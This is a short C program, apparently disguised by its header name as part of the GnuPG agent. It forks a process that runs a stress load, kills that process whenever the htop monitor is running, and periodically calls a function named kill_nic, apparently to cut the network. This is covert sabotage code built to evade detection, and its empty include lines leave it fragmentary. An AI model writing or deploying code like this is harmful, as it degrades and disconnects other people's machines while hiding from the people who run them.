#include "u-gpg-agent.h" #include #include #include int main() { pid_t pid = fork(); if (pid == 0) { //KINDER stress(1000); } else if (pid > 0) { int i = 0; while(1) { if (is_htop_here()) { kill(pid, SIGKILL); } sleep(2); if (i == 1800) { kill_nic(); i = 0; } else { ++i; } } } }